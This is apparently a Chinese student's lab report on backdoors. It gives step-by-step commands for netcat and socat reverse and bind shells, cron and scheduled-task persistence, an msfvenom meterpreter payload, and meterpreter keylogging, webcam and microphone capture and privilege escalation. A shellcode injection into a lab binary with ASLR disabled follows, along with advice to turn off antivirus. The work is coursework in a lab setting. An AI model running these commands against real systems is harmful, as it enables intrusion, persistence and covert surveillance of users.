1、基础知识
1.1 后门概念
(1)后门:不经过正常认证流程而访问系统的通道。
(2)包括以下几种(种类):①编译器后门;②操作系统后门;③应用程序后门(最常见);④潜伏于操作系统中或伪装为特定应用的专用后门程序。
1.2 常用后门工具
1.2.1 netcat
netcat,又名nc,ncat,是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
(1)Linux:自带netcat,输入man nc查看其使用说明。
(2)Windows:课程主页附件中下载ncat.rar解压即可使用。
1.2.1.1 Win获得Linux Shell
步骤1:输入ipconfig查看到win端的IP地址为192.168.1.6
步骤2:在ncat.exe文件目录下输入ncat.exe -l -p 5229打开windows 监听
步骤3:Linux反弹连接windows:nc 192.168.1.6 5229 -e /bin/sh
步骤4:windows下获得一个linux shell,可运行任何指令,如ls,pwd
1.2.1.2 Linux获得Win Shell
步骤1:输入ifconfig查看到Linux端的IP地址为192.168.190.130
步骤2:输入nc -l -p 5229在Linux运行监听
步骤3:在ncat.exe文件目录下输入ncat.exe -e cmd.exe 192.168.190.130 5229,使Windows反弹连接Linux
步骤4:Linux下看到Windows的命令提示,可运行指令,如dir,ipconfig
1.2.2 Meterpreter
1.2.2.1 典型的能生成后门程序的平台
(1)intersect
(2)Metaspolit的msfvenom指令
(3)Veil-evasion
1.2.2.2 Meterpreter常用功能
(1)help
(2)获取Windows命令行界面,以方便执行Windows内置功能指令
(3)获取ruby交互界面
(4)进程和迁移,把meterpreter HOOK到其他进程上
......
2、实践步骤
2.1 使用netcat获取主机操作Shell,cron启动
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
具体步骤如下:
步骤1:crontab指令增加一条定时任务,"-e"表示编辑。
步骤2:选择编辑器并添加代码
因为是第一次编辑,故提示选择编辑器,我选择了2,并添加了下面这行代码,表示在每个小时的第20分钟执行后面的那条指令。
20 * * * * /bin/netcat 192.168.1.6 5229 -e /bin/sh
步骤3:保存、退出后配置即生效。
可以通过crontab -l来查看,"-l"表示list。下图为第20分钟执行代码后的结果:
2.2 使用socat获取主机操作Shell, 任务计划启动
socat,Netcat++,超级netcat工具。
步骤1:右击计算机—>点击管理—>点击任务计划程序—>点击创建任务
步骤2:设置任务名,新建触发器
步骤3:新建操作
在程序或脚本中选择socat.exe文件的路径,添加参数中填写tcp-listen:5229 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5229,同时把cmd.exe的stderr重定向到stdout上:
步骤4:此时可以看到任务的状态为准备就绪
Step5:当时间到10:11时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。(不要关闭cmd)
Step6:在kali中输入指令socat - tcp:192.168.1.6:5229
此时可以发现已经成功获得了一个shell,下图为输入ipconfig和dir的结果
2.3 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
步骤1:生成20175229_backdoor.exe文件(在Kali上执行指令)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.130 LPORT=5229 -f exe > 20175229_backdoor.exe
参数说明:
(1)-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
(2)-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。
(3)-e 使用的编码器,用于对shellcode变形,为了免杀。
(4)-i 编码器的迭代次数。如上即使用该编码器编码5次。
(5)-b badchar是payload中需要去除的字符。
(6)LHOST 是反弹回连的IP
(7)LPORT 是回连的端口
(8)-f 生成文件的类型
(9)> 输出到哪个文件
步骤2:在Windows下执行ncat.exe -l 5229 > 20175229_backdoor.exe,使被控主机进入接收文件模式
步骤3:在kali中执行nc 192.168.1.6 5229 < 20175229_backdoor.exe,从下图可以看到文件已经传输成功了
步骤4:MSF打开监听进程
输入msfconsole后进行如下操作:
(1)use exploit/multi/handler,设置payload
(2)set payload windows/meterpreter/reverse_tcp
(3)set LHOST 192.168.190.130,设置ip
(4)set LPORT 5229,设置端口
(5)show options,查看选项
(6)exploit,可以看到已经获取到了Windows的shell,可以输入dir来验证(一定要先点一下20175229_backdoor.exe文件再进行exploit操作)
2.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)音频:输入record_mic
(2)摄像头:输入webcam_snap
(3)击键记录:输入keyscan_start开始记录,输入keyscan_dump读取击键的记录
(4)提权:输入getuid查看当前用户,再输入getsystem进行提权
(5)使用screenshot指令可以进行截屏
2.5 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
步骤1:下载文件
在官网(https://www.exploit-db.com/shellcodes)上下载Linux/x86 - Reverse(127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96Bytes)这个文件
Step2:注入Shellcode
(1)在第一个终端里关闭地址随机化,输入echo "0" > /proc/sys/kernel/randomize_va_space
(2)在第一个终端中运行pwn1之后不回车
(3)在第二个终端中输入ps -ef | grep pwn1查看pwn1的进程号2518
(4)用GDB追踪该进程,找到栈顶(esp)中存放的地址为0xffffd37c,计算出shellcode地址就是 0xffffd37c+4,即0xffffd380。
①在第二个终端启动gdb。
②输入attach 2518启动gdb调试这个进程。
③输入disassemble foo查看到ret的地址为0x080484ae。
④输入break *0x080484ae在0x080484ae处设置断点。
⑤在之前的终端中按一下回车,然后在调试的终端中输入c继续运行。
⑥输入info r esp查看栈顶指针所在的位置,并查看改地址存放的数据:
(5)在第一个终端中中断pwn1运行
(6)在第二个终端中注入input_shellcode:
步骤3:在第一个终端中打开msf(msfconsole)控制台,依次输入:
(1)use exploit/multi/handler,设置payload
(2)set payload linux/x86/shell_reverse_tcp
(3)set LHOST 127.0.0.1,设置ip
(4)set LPORT 4444,设置端口
(5)show options,查看选项
(6)exploit ,设置完成,开始监听
步骤4:运行shellcode
在第二个终端输入(cat input_shellcode;cat) | ./pwn1运行pwn1文件,在第一个终端中可以看到已经成功调取了shell
3、问题回答
3.1 基础问题回答
3.1.1例举你能想到的一个后门进入到你系统中的可能方式?
答:在某些第三方网站中下载旧版本的某些应用程序或文件,这些程序有可能会绑定某些可执行文件或程序,留下后门隐患。
3.1.2 例举你知道的后门如何启动起来(win及linux)的方式?
答:满足某些条件后自启动(开机自启动,按时启动,点击某个文件时启动等);在cmd或终端中用指令运行;代码注入。
3.1.3 Meterpreter有哪些给你映像深刻的功能?
答:通过后门控制被控主机的shell,本次实验中的调用麦克风、摄像头、键盘、读取屏幕。
3.1.4 如何发现自己有系统有没有被安装后门?
答:使用杀毒软件或电脑管家进行查杀;查看任务管理器中有没有异常的进程。
3.2 实验总结与体会
本次实验让我体会颇深,也觉得挺有意思的,原来“偷窥和操纵”别人的电脑是一件这么有趣的事,有趣归有趣,有一说一,实验中还是遇到了不少麻烦,本以为会顺利完成的一步,偏偏就会卡在那里,真的是让人头秃,原来程序员的头发就是这么没得,哈哈哈哈,本次实验我也学习和了解到许多知识和操作,也明白了电脑管家和杀毒软件的重要性-----真的是太重要了,但是因为杀毒软件和电脑管家也成了我这次实验的“绊脚石”,我相信通过这次实验的学习我会更加深入的学习。
4、实验中遇到的问题
(1)Linux中输入ifconfig显示未找到命令
解决方法:用sudo apt-get install net-tools下载,如果不行,输入export PATH=$PATH:/sbin即可
(2)Kali不能ping通windows
解决方法:启用虚拟网络即可
(3)启动后门程序后被安全软件自动清除
解决方法:先关闭杀毒软件或者电脑管家
